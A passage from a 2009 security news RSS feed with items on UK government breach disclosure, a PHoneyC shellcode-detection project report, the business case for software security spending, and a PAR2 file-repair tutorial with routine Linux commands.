<link>http://blog.itsecurityexpert.co.uk/2009/07/secret-service-tells-uk-government-not.html</link>
<pubDate>Sun, 05 Jul 2009 20:20:00 +0100</pubDate>
<category>government security</category>
<description>Are you wondering why there haven’t been any UK Government Department Information breaches making the news headlines in recent months? Have our government departments resolved their poor Information Security Management and poor security cultures? Have other topics such as swine flu and dodgy MP expenses claims kept government data breach headlines out of the press? I would love to think UK Government Departments have cleaned up their Information Security Act, as I know serious efforts are being made, however we can't really be sure government have stemmed their poor information management tide, as I heard another reason which goes to explain why the once steady drip of media coverage of government departments' data breaches has come to a halt.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://blog.itsecurityexpert.co.uk/uploaded_images/db-790914.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://blog.itsecurityexpert.co.uk/uploaded_images/db-790913.gif" width="147" xj="true" /&gt;&lt;/a&gt;&lt;/div&gt;I don’t want to name any names, but I heard a member of a government committee working on the Digital Britain report say, government departments had been advised by a UK security service department to stop publicising data breaches, because it is letting our enemies know our weaknesses. 
If this is indeed true, I have to say I really don’t agree with this sweeping under the carpet approach, for one the cat is already out of the bag regarding our government's track record on security, tens of millions of records have been lost that we know about, so I think our enemies already know about our weaknesses!&lt;br /&gt;&lt;br /&gt;I am a supporter of the &lt;a href="http://blog.itsecurityexpert.co.uk/2009/01/why-uk-data-breach-disclosure-laws-are.html"&gt;public disclosure of data breaches &lt;/a&gt;where the public's personal information is involved, to the extent I would like to see UK laws passed to ensure all organisations, both within the private and the public sectors, disclose any data breaches where citizen personal information has been actually or potentially compromised. The reason we need such laws is I feel it is the only real way entire industries and individual organisations will be bothered enough to raise their information security to the required standards, and better secure all our personal information. I believe it should be a fundamental right that we are informed if (more like when) our government or indeed a private company, loses our personal information, placing us at increased risk of serious cybercrimes like identity theft, which is the UK’s fast growing crime. Only by holding government department heads and business senior directors to account for such breaches, will organisations truly recognise the importance of properly securing our personal information, which after all we have entrusted to their care.</description>
</item>
<item>
<title>The Curious Case of Asset Valuation</title>
<guid>http://riskmanagementinsight.com/riskanalysis/?p=641</guid>
<link>http://riskmanagementinsight.com/riskanalysis/?p=641</link>
<pubDate>Sun, 05 Jul 2009 20:02:44 +0100</pubDate>
<category>Chicken Littles</category>
<description>I recently had a discussion with someone about how to do asset valuation for risk assessments. It was a good discussion that prompted me to share with you. The whole concept of asset valuation (as it exists for information security) is predicated on the assumption that acquisition cost is a good constituent factor of security [...]</description>
</item>
<item>
<title>Into the Breach – Audio Series – The Introduction</title>
<guid>http://www.securitycatalyst.com/?p=2037</guid>
<link>http://feedproxy.google.com/~r/SecurityCatalyst/~3/aN-sHKOG8dQ/</link>
<pubDate>Sun, 05 Jul 2009 19:43:04 +0100</pubDate>
<category>Blog</category>
<description>Welcome to the audio series of Into the Breach: Protect Your Business by Managing People, Information and Risk (click this link to learn more about this book). This series, underwritten by Configuresoft, now part of EMC, is the full and unabridged audio version of Into the Breach, written by Michael Santarcangelo and read by the [...]</description>
<enclosure url="http://feedproxy.google.com/~r/SecurityCatalyst/~5/Y4NRTGwjLcc/ITB-Santarcangelo-INTRODUCTION.mp3" length="9640278" type="audio/mpeg" />
</item>
<item>
<title>What's new on phoneyc (3)--- Mid-term Evaluation</title>
<guid>460 at http://honeynet.org</guid>
<link>http://honeynet.org/node/460</link>
<pubDate>Sun, 05 Jul 2009 18:41:19 +0100</pubDate>
<category>gsoc</category>
<description>
&lt;h3 class="title"&gt;Mid-term Report on &lt;a class="reference external" href="http://code.google.com/p/phoneyc/"&gt;PHoneyC&lt;/a&gt; GSoC project 1&lt;/h3&gt;
&lt;table class="docinfo" border="0" frame="void" rules="none"&gt;
&lt;tbody&gt;
&lt;tr class="field"&gt;
&lt;th class="docinfo-name"&gt;Info:&lt;/th&gt;
&lt;td class="field-body"&gt;See &amp;lt;&lt;a class="reference external" href="/gsoc/project1"&gt;https://www.honeynet.org/gsoc/project1&lt;/a&gt;&amp;gt; for&lt;br /&gt;
project details.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th class="docinfo-name"&gt;Author:&lt;/th&gt;
&lt;td&gt;Zhijie Chen (Joyan) &amp;lt;&lt;a class="reference external" href="mailto:czj.pub@gmail.com"&gt;czj.pub@gmail.com&lt;/a&gt;&amp;gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="field"&gt;
&lt;th class="docinfo-name"&gt;Mentor:&lt;/th&gt;
&lt;td class="field-body"&gt;Jose Nazario&lt;/td&gt;
&lt;/tr&gt;
&lt;tr class="field"&gt;
&lt;th class="docinfo-name"&gt;Description:&lt;/th&gt;
&lt;td class="field-body"&gt;Mid-term Report on &lt;a class="reference external" href="http://code.google.com/p/phoneyc/"&gt;PHoneyC&lt;/a&gt; GSoC project 1. This report&lt;br /&gt;
describes what I have done on the PHoneyC's libemu integration&lt;br /&gt;
for shellcode and heapspray detection during the first half of&lt;br /&gt;
the GSoC. Till now, the main ideas on this feature have been&lt;br /&gt;
fast-implemented (actually I mean poor coding style) and the&lt;br /&gt;
whole flow works well, with some code rewriting and performance&lt;br /&gt;
optimization needed in the future.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
</description>
</item>
<item>
<title>SCO's Proposed Amended Complaint Against AutoZone, as text - Updated - Chart</title>
<guid>20090705085301701</guid>
<link>http://www.groklaw.net/article.php?story=20090705085301701</link>
<pubDate>Sun, 05 Jul 2009 18:31:00 +0100</pubDate>
<description>As I mentioned earlier, SCO is &lt;a href="http://www.groklaw.net/pdf/AZ-99.pdf"&gt;asking the court&lt;/a&gt; [PDF] to let it amend its complaint against AutoZone, which is probably the only way it can go forward unless the appellate court rules in SCO's favor -- and then a jury does too, down the road apiece.  We have the motion and the proposed amended complaint as text now. &lt;P&gt; A normal litigant would just fold up shop and call  it quits, now that Novell has been ruled the owner of the copyrights that SCO was suing AutoZone about.  Not SCO. It is addicted to litigation, I guess, or someone is making them do it.&lt;P&gt;

Like the Devil. &lt;P&gt;Just kidding around. I don't know why they do what they do. But whatever the reason, now that the judge has &lt;a href="http://groklaw.net/article.php?story=20090312090154578"&gt;told them to get a move on with this case&lt;/a&gt; and wrap it up as opposed to waiting until the appeal in Novell is over, rather than admit they had no case, they would like to morph the complaint to be about contract breach and more about OpenServer. &lt;P&gt;Is that not totally the SCO you've come to know?</description>
</item>
<item>
<title>Why phishers target low value accounts</title>
<guid>http://silvertailsystems.wordpress.com/?p=655</guid>
<link>http://silvertailsystems.wordpress.com/2009/07/05/why-phishers-target-low-value-accounts/</link>
<pubDate>Sun, 05 Jul 2009 18:27:20 +0100</pubDate>
<category>Online Fraud</category>
<description>PCWorld talks about a recent phishing scam on Twitter. The question in the article is:
In this instance, it appears the site primarily used compromised accounts to spread the phishing links further. What, if any, broader goal was behind the effort is not yet clear.
I&amp;#8217;ve posted about this before, but it seems prudent to talk about [...]</description>
</item>
<item>
<title>The 10 dumbest mistakes network managers make</title>
<link>http://www.networkworld.com/news/2009/070609-network-managers-mistakes.html</link>
<pubDate>Sun, 05 Jul 2009 17:00:00 +0100</pubDate>
<description>When you look at the worst corporate security breaches, it's clear that network managers keep making the same mistakes over and over again, and that many of these mistakes are easy to avoid.</description>
</item>
<item>
<title>Connections</title>
<guid>http://seclists.org/dailydave/2009/q3/0004.html</guid>
<link>http://seclists.org/dailydave/2009/q3/0004.html</link>
<pubDate>Sun, 05 Jul 2009 16:20:37 +0100</pubDate>
<description>Posted by Dave Aitel on Jul 5&lt;p&gt;
You forget, if you are lucky enough to spend all your time in the same office with &amp;quot;Senior Security Researchers&amp;quot; (or traveling to conferences as some of us do) that many hackers at conferences have not met another hacker face to face in a long time. Face to face is very high...</description>
</item>
<item>
<title>Photos: Spiral Jetty, Robert Smithson's wondrous earthwork</title>
<guid>http://news.cnet.com/2300-13576_3-10001156.html</guid>
<link>http://news.cnet.com/2300-13576_3-10001156.html?tag=rsspr.6249852&amp;part=rss&amp;subj=news</link>
<pubDate>Sun, 05 Jul 2009 16:00:00 +0100</pubDate>
<description>On the north side of the Great Salt Lake, far from civilization, is one of the grandest pieces of large-scale art in the world. Made up of volcanic basalt, Spiral Jetty is a Road Trip 2009 highlight.</description>
</item>
<item>
<title>Business Cases For Software Security Initiatives</title>
<guid>tag:blogger.com,1999:blog-17906156.post-1223224957838984560</guid>
<link>http://securesoftware.blogspot.com/2009/07/business-cases-for-software-security.html</link>
<pubDate>Sun, 05 Jul 2009 14:30:00 +0100</pubDate>
<category>Software Security Frameworks</category>
<description>I covered the topic of business cases for software security initiatives in the past in articles (&lt;a href="http://www.issa.org/"&gt;ISSA Journal 2006&lt;/a&gt;, &lt;a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-16.pdf"&gt;In-secure Magazine 2008&lt;/a&gt;) as well as in presentations to security conferences (&lt;a href="http://www.slideshare.net/marco_morana/software-security-business-case-presentation"&gt;Black Hat in 2006&lt;/a&gt; and &lt;a href="http://www.slideshare.net/marco_morana/software-security-initiativesroadmaps-and-business-cases-presentation"&gt;OWASP in 2008&lt;/a&gt;). When asked how I can make the business case for software security that's how I articulate my answer: &lt;strong&gt;&lt;br /&gt;1) Approach the business case from information risk management perspective &lt;br /&gt;2) Quantify software security failure costs with software engineering data  &lt;br /&gt;3) Justify software security expense with cost vs. benefits analysis &lt;br /&gt;4) Adopt a long term investment strategy&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Building software security into the organization’s software engineering and information security practices is best accomplished by following software security maturity models (e.g. &lt;a href="http://www.bsi-mm.com/"&gt;BSIMM&lt;/a&gt; or &lt;a href="http://www.opensamm.org/"&gt;SAMM&lt;/a&gt;) as well as by adopting frameworks to build security in the SDLC. 
Software security frameworks integrate software security activities in the SDLC along with other organization information security processes such as information risk management, defect management, patch management, training and awareness.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;A pre-requisite for the software security initiative business case is the availability of the organization risk data that include risk management, vulnerability metrics as well as of software engineering data such as defect management.&lt;/strong&gt; From the software engineering perspective for example, the assumption is that your organization already measures the costs for fixing software security failures due to known vulnerabilities as well as the cost of fixing the ones resulting from incidents/exploits. Total software security failure costs include both the cost of business impact in exploiting failures (e.g. cost of a vulnerability exploit that caused harm to the organization such as denial of service) as well as the cost to fixing a known defect due to a security issue, being a security bug, a design flaw or a mis-configuration.&lt;strong&gt;&lt;br /&gt;The problem of the security metrics is that implies that the organization software and information security practices are matured enough to use data from risk management, fraud management, vulnerability assessment, software engineering/project management, quality assurance measured and correlated.&lt;/strong&gt; A metrics that correlates software engineering and information risk management disciplines for example, not only implies that development teams have already started adopting security in the SDLC (e.g. 
by using processes such as MS SDL, OWASP CLASP, Cigital ™TP) but also that they have started working together with security teams to measure software security risks and manage them through the SDLC.&lt;br /&gt;&lt;strong&gt;Basically the business case for the software security initiative needs the data that the initiative is supposed to provide.&lt;/strong&gt; In essence this is a chicken vs. egg problem: you can only manage what you measure, and you need metrics to make the business case.&lt;br /&gt;&lt;strong&gt;From an information security perspective, the business case for software security needs to start from the organization's information risk management data and business impact analysis, and to rate application vulnerabilities as critical when these correlate to business impacts.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;For this reason (i.e. the lack of organization software security data) the business case for software security is one that is hard to make. So what are the alternatives for the business case in the absence of such risk data? The answer is you need to make assumptions on software engineering costs and the cost of fixing vulnerabilities as well as the financial losses that vulnerability exploits might cause.&lt;/strong&gt; If the business case needs to be made by engineering and software development teams for example, you can assume a software engineering perspective and refer to public studies that analyze the cost of "software defects". A &lt;a href="http://www.nist.gov/director/prog-ofc/report02-3.pdf"&gt;NIST study&lt;/a&gt; on the economic impact of insecure testing for example shows that the cost of fixing defects is 100 times more expensive during system testing than coding. You can localize this metric to how much it would cost your organization to fix a vulnerability from a quality/defect management perspective. 
Assuming your organization has adopted a web application penetration testing process, some vulnerability metrics can also be used and correlated with the cost of fixing them.&lt;br /&gt;&lt;br /&gt;If your organization's application security and information security practices are reactive rather than proactive, you can refer to the cost of producing security patches (e.g. hotfixes) to fix vulnerabilities.&lt;strong&gt; In the absence of company data you can make assumptions such as that the cost of engineering, developing, testing and deploying a patch to your vulnerable software/web application is, let's say, $ 10,000: it is realistic to assume that making this fix earlier in the SDLC would have cost you 10% of patching costs, saving your company 90% of overall patching costs (e.g. $ 9,000).&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;But just including patching costs is not conservative enough for a real estimate of total software security failure costs: you also need to include the business impact of exploits, such as the risk of exploiting either a known vulnerability or an unknown vulnerability (e.g. Zero Day), such as the ones that are exploited and do not follow responsible public disclosure, causing the organization intangible costs.&lt;/strong&gt; Even in the absence of a vulnerability exploit it is still important to factor in the cost posed by the business impact to the organization caused by the exploit of the vulnerability. In the case of intangible costs for example, what is the intangible cost of a cross site scripting vulnerability publicly disclosed on the &lt;a href="http://www.xssed.com/"&gt;XSSEd.com&lt;/a&gt; site? How much is the cost of reputation damage from having such a vulnerability publicly disclosed? 
Any publicly published vulnerability can cause intangible loss to company reputation, the company brand and the franchise and affect customer confidence in the company's products and services.&lt;br /&gt;Would intangible costs by themselves justify the existence of a responsible disclosure process to engage security researchers that have found your site's vulnerabilities? YES. Would this justify fixing all known vulnerabilities before going into production with a penetration test? YES.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;But to really factor software failure costs as the business impact of exploiting a vulnerability it is important to correlate attacks with vulnerabilities and the business impact that they cause.&lt;/strong&gt; The recent data from the &lt;a href="http://www.xiom.com/whid"&gt;Web Hacking Incident DB&lt;/a&gt;, which correlates public information from security incidents with web application attack vectors, for example has SQL injection as #1 (19% of all attacks), which includes manual targeted attacks as well as mass SQL injection bots. &lt;strong&gt;From the perspective of attack vs. risk prioritization, SQL injection vulnerabilities represent the ones that most likely will be exploited to cause harm to your organization&lt;/strong&gt; and are the ones that would produce high failure costs (e.g. 
use to break into authentication, upload malware, denial of service, un-authorized access to sensitive data); when mitigated, SQL injection vulnerabilities would provide the most benefit in terms of mitigating business impacts. &lt;strong&gt;Since the root cause of SQL injection vulnerabilities is coding, such as using concatenated SQL statements instead of stored procedures or prepared statements, fixing SQL injection vulnerabilities in the code alone would make the case for adopting secure code reviews.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Most organizations' directors of technology and security try to sell technologies and new initiatives to high management with the sales pitch of "money for the bang" (MFTB). The MFTB business case answers the basic question: if I spend that much on a security technology or process, what is the benefit for security? In technical terms this means doing a Cost vs Benefit Analysis (CBA). CBA can be used in security to correlate the total cost of security to increased information or software security assurance. Dan Geer covers this analysis well as related to data security in his book "&lt;a href="http://www.verdasys.com/thoughtleadership/"&gt;Economics and Strategies of Data Security&lt;/a&gt;". By analogy, in the case of software security, "money for the bang" spending decisions need to take into account all failure costs, such as the total cost of failing as business impact as well as the total cost of finding, fixing, testing and deploying the security defect. The cost of software security failure can be compared against the "anticipation costs", that is, the costs incurred in proactively spending on software security initiatives. 
&lt;strong&gt;The general law is that failure costs decrease exponentially as anticipation costs rise.&lt;/strong&gt; From a risk management perspective this means that the overall software security costs decrease to a minimum and then rise again when you spend more money on anticipating the failure than the failure might actually cost. &lt;strong&gt;You will reach an optimum where more spending on anticipation costs is not worth it. This optimal spending for anticipation costs is about 40% (to be exact 37% according to &lt;a href="http://weis2006.econinfosec.org/docs/12.pdf"&gt;Gordon and Loeb research: The Economics of Information Security Investment&lt;/a&gt;) of the failure costs. &lt;strong&gt;According to these figures it is fair to assume that optimal spending for defensive coding is 37% of what your software failure costs are. Assume for example that the software security failure cost is $ 10 ML: it would be optimal to spend as much as $ 3.7 ML on acquiring software security tools and technology, developing new software security processes, as well as on new software security training activities.&lt;/strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Assume your organization has fraud data that can be correlated to the e-commerce channel: this data can also be used to make this business case, and spending as much as 37% of the fraud costs on application and software security initiatives can be justified.&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;In the case of fraud data related to identity theft occurring via the web channel, you can factor the overall fraud related to data loss potentially impacting your organization and &lt;strong&gt;consider that 14% of all publicly reported data loss incidents occur via the web channel according to the data collected from &lt;a href="http://datalossdb.org/"&gt;datalossdb.org&lt;/a&gt;. &lt;/strong&gt;Assuming 2003 FTC data, the potential loss per identity theft incident is $ 655. 
Assume you are serving a population of 4 million customers: the potential loss would be $ 2,6 Billion, and with a probability of identity theft occurrence of 4.6 % (also FTC data) the projected loss would be $ 120 ML, of which 14% or $ 16 ML would be the cost of data losses via the web channel. &lt;strong&gt;With these assumptions on data loss impact, an information, application and software security program aimed at protecting customer data access via the web channel that costs as much as $ 16 ML would be justified for a company with a customer base of 4 million on-line customers.&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;A quantitative risk assessment can be used to determine the extent to which a software security initiative can reduce risk from potential losses.&lt;/span&gt; The correlation has to take into account the probability of the event and the loss that the event can cause. This is difficult to quantify in general for software security issues since it assumes a cause-effect relationship between vulnerability exploit and financial impact. Nevertheless it can be used for rough estimates. Assume for example a web application that delivers banking services, and that an event such as denial of service impacts on-line transactions for 3 million customers with an average of $ 20 per transaction: the loss per single DOS event (SLE) is $ 60 ML.&lt;strong&gt; Assume that the probability that a new SQL injection vulnerability would cause a denial of service is 30% (Annualized Rate of Occurrence): then the Annual Loss Expected (ALE) is $ 1.8 ML. If the cost of the new security countermeasures that will stop the security incident is less than $ 1.8 M then the organization should implement them.&lt;/strong&gt; Assuming the countermeasure in this case is the total cost of secure code reviews, you need to factor in the cost of tools and technologies/APIs (e.g. source code analysis and penetration tools), of the security engineering process (e.g. 
documentation and metrics) as well as of software security training and awareness for developers. The tools and technologies need to include the Total Cost of Ownership, that is, both the cost of acquiring and the cost of maintaining the technology. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Besides cost vs benefit analysis and quantitative risk assessment, &lt;a href="http://www.infosecwriters.com/text_resources/pdf/ROSI-Practical_Model.pdf"&gt;the return of security investment (ROSI)&lt;/a&gt; can be used to make the software security business case around the effectiveness of a software security initiative&lt;/strong&gt;. ROSI answers the question: if I spend 100K on a software security initiative, do I save more money by fixing defects with a penetration test, secure coding or threat modeling? Again this is where metrics are essential: making the case with ROSI assumes you already collect SDLC data that show how much it costs to perform software security in each phase, the number of issues being identified at each phase and how many are fixed at each phase, so that you can make the business case for one activity vs another. Otherwise you can reference the public study of &lt;a href="http://www.mudynamics.com/assets/files/Tangible%20ROI%20Secure%20SW%20Engineering.pdf"&gt;ROSI from Kevin Soo Study&lt;/a&gt;: for every 100K spent on software security, 21K are saved by doing application threat modeling during design, 15 k are saved by doing source code analysis and 12 k are saved when defects are found with penetration tests. &lt;strong&gt;Overall the earlier you invest in security the greater the return.&lt;/strong&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=KYl5_lzSlI0:Bl4kymnhjSc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=KYl5_lzSlI0:Bl4kymnhjSc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
<enclosure url="http://www.net-security.org/dl/insecure/INSECURE-Mag-16.pdf" length="11663832" type="application/pdf" />
</item>
<item>
<title>Report: Problems stymie U.S. cyberspy protection</title>
<guid>http://news.cnet.com/8301-1009_3-10279475-83.html</guid>
<link>http://news.cnet.com/8301-1009_3-10279475-83.html?part=rss&amp;tag=feed&amp;subj=News-Security</link>
<pubDate>Sun, 05 Jul 2009 14:13:00 +0100</pubDate>
<description>&lt;p&gt;
Twin obstacles of technical problems and privacy issues are holding back the overarching system created to protect the federal government's computers from cyberspies, &lt;a href="http://online.wsj.com/article/SB124657680388089139.html"&gt;according to The Wall Street Journal&lt;/a&gt;.

&lt;/p&gt;&lt;p&gt;

"The latest complete version of the system, known as &lt;a title="DHS stays mum on new 'Cyber Security' center -- Thursday, Jul 31, 2008" href="http://news.cnet.com/8301-13578_3-10004266-38.html" &gt;Einstein&lt;/a&gt;, won't be fully installed for 18 months, according to ...&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=wc4ZnzMOE4A:QryHtOAv_A4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/AmbersailSecNews?a=wc4ZnzMOE4A:QryHtOAv_A4:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/AmbersailSecNews?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
</item>
<item>
<title>Sysadmin Sunday: Guard against file corruption with PAR</title>
<guid>tag:blogger.com,1999:blog-5554915078212081470.post-1164722133117688142</guid>
<link>http://feedproxy.google.com/~r/HiR/~3/T2Z5-ygCgfQ/sysadmin-sunday-guard-against-file.html</link>
<pubDate>Sun, 05 Jul 2009 14:00:00 +0100</pubDate>
<category>repair</category>
<description>&lt;span style="font-weight: bold;"&gt;Introduction:&lt;/span&gt;&lt;br /&gt;Bit rot, File corruption, partial file transfer, call it what you will, digital transmission mediums some times fail and you are left with a corrupted fragment of data if any at all.  In the case of large files in which re-transmission would take hours or days, this is a tough situation.&lt;br /&gt;&lt;br /&gt;PAR uses a RAID like technique to salvage corrupted files in most cases only needing to obtain files containing restore information that are a fraction of the size of the original file.&lt;br /&gt;&lt;br /&gt;This article is intended for people with basic to intermediate understanding of a un*x style operating system.&lt;br /&gt;&lt;br /&gt;-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Table of contents:&lt;/span&gt;&lt;br /&gt;1. PAR and the Reed-Solomon error correction algorithm&lt;br /&gt;2. Available applications based off of PAR&lt;br /&gt;3. Examples&lt;br /&gt;4. Informative resources&lt;br /&gt;&lt;br /&gt;-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. PAR and the Reed-Solomon error correction algorithm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The Reed-Solomon algorithm was developed in 1960 by Irving S. Reed and Gustave Solomon.  It is used in many technologies such as CD's, BlueRay, DSL Modems, RAID6 and more.  This method of error correction is used to protect against certain forms of media defects or data transmition errors.&lt;br /&gt;&lt;br /&gt;The PAR utility was developed by Tobias Rieper and Stefan Wehlus for the purpose of recovering corrupted files and file fragments from Usenet posts with out needing to download the file all over again.  Later, to compensate for some limitations of PAR, the PAR2 specification was developed by Michael Nahas and Peter Clements.  
Clements then wrote some of the first PAR2 applications.&lt;br /&gt;&lt;br /&gt;A simple way of explaining what PAR does is that it takes the original source files, then applies the mathematical algorithm to them, producing a sort of processed description of what each file looks like.  Then let's say you send someone a file but for some reason the transmission fails midway through.  All that needs to be done is to download the results of the mathematical operation (which are significantly smaller than the original file) and run the par utility to apply the math to the file fragment.  Par can fill in the blanks using the algorithm and restore the file.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. Available applications based off of PAR&lt;/span&gt;&lt;br /&gt;There is of course the aforementioned open source application written by Peter Clements et al.  There are a slew of other PAR clients for Mac, OS 9 and 10, Windows, Linux, BSD and more.  Though the PAR1 specification is incompatible with the PAR2 specification, most clients support both formats side by side. For a detailed list of PAR compliant projects check out the &lt;a href="http://parchive.sourceforge.net/#clients"&gt;Parchive sourceforge website&lt;/a&gt;.  If you are using Linux, you can either download a Linux rpm or source tarball from the &lt;a href="http://sourceforge.net/projects/parchive/"&gt;sourceforge site&lt;/a&gt;, or use a package system such as apt-get to download it from your distribution's package archives.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. Examples&lt;/span&gt;&lt;br /&gt;In this example I am using Ubuntu Linux.&lt;br /&gt;&lt;ol&gt;&lt;li&gt;This will require the Ubuntu Universe repository.  
You can uncomment this in "/etc/apt/sources.list" using "&lt;span style="color: rgb(0, 153, 0);font-size:85%;" &gt;sudo vi /etc/apt/sources.list&lt;/span&gt;".&lt;/li&gt;&lt;li&gt;Then update your sources using "&lt;span style="color: rgb(0, 153, 0);font-size:85%;" &gt;sudo apt-get update&lt;/span&gt;".&lt;/li&gt;&lt;li&gt;Finally get the par2 package using "&lt;span style="color: rgb(0, 153, 0);font-size:85%;" &gt;sudo apt-get install par2&lt;/span&gt;".&lt;/li&gt;&lt;/ol&gt;Now let's test par2 to see if it can recover a file:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Using dd, create a 10MB test data file from /dev/zero: "&lt;span style="color: rgb(0, 153, 0);font-size:85%;" &gt;dd if=/dev/zero of=/tmp/testdata.bin bs=1024 count=10240&lt;/span&gt;"&lt;/li&gt;&lt;li&gt;Then create our par2 file and recovery blocks: "&lt;span style="color: rgb(0, 153, 0);font-size:85%;" &gt;par2 create testdata.par2 testdata.bin&lt;/span&gt;"&lt;/li&gt;&lt;li&gt;Now I'm going to copy the original data to a different name, then make some changes to it.&lt;/li&gt;&lt;li&gt;Then I run "&lt;span style="color: rgb(0, 153, 0);font-size:85%;" &gt;par2 verify testdata.par2 testdata.bin&lt;/span&gt;"&lt;/li&gt;&lt;li&gt;par2 tells me that I need one recovery block to repair the file. (* During the create process par2 created several repair blocks. Since par2 over-samples, I can use either the largest repair file or a combination of the smaller files for the same effect.)  In this case I just need to have the repair block file called &lt;span style="font-size:85%;"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;testdata.vol000+01.par2&lt;/span&gt;&lt;/span&gt; in the same directory.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;I then type in "&lt;span style="color: rgb(0, 153, 0);font-size:85%;" &gt;par2 repair testdata.par2 testdata.bin&lt;/span&gt;", whereupon it reports that the file has been repaired.&lt;/li&gt;&lt;/ol&gt;&lt;span style="font-weight: bold;"&gt;4. 
Informative resources&lt;/span&gt;&lt;br /&gt;Clements, Peter; Gallagher, Ryan; Nahas, Mike; et al.  "Parity Archive Volume Set: File&lt;br /&gt;   Specification, Clients, and Related Resources" (Accessed July 2009).&lt;br /&gt;   &lt;a href="http://parchive.sourceforge.net/"&gt;http://parchive.sourceforge.net/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Wikipedia.org "Reed-Solomon Error Correction" (Accessed July 2009).&lt;br /&gt;   &lt;a href="http://en.wikipedia.org/wiki/Reed%E2%80%93Solomon_error_correction"&gt;http://en.wikipedia.org/wiki/Reed%E2%80%93Solomon_error_correction&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Wikipedia.org "Parchive" (Accessed July 2009).&lt;br /&gt;   &lt;a href="http://en.wikipedia.org/wiki/Parchive"&gt;http://en.wikipedia.org/wiki/Parchive&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;P&gt;HiR Information Report is a proud member of the &lt;A HREF="http://security.lijitnetworks.com/"&gt;Security Bloggers Network&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This content originally posted on &lt;A HREF="http://www.h-i-r.net/"&gt;HiR Information Report&lt;/A&gt;. Copyright © 2008, HiR&lt;/P&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/w0kjShVu7qpZRxdRUVy40RUzZ2U/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/w0kjShVu7qpZRxdRUVy40RUzZ2U/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/w0kjShVu7qpZRxdRUVy40RUzZ2U/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/w0kjShVu7qpZRxdRUVy40RUzZ2U/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HiR?a=T2Z5-ygCgfQ:JKEi8-GxF-o:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HiR?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HiR?a=T2Z5-ygCgfQ:JKEi8-GxF-o:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HiR?i=T2Z5-ygCgfQ:JKEi8-GxF-o:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HiR?a=T2Z5-ygCgfQ:JKEi8-GxF-o:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HiR?i=T2Z5-ygCgfQ:JKEi8-GxF-o:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HiR/~4/T2Z5-ygCgfQ" height="1" width="1"/&gt;&lt;div class="feedflare"&gt;
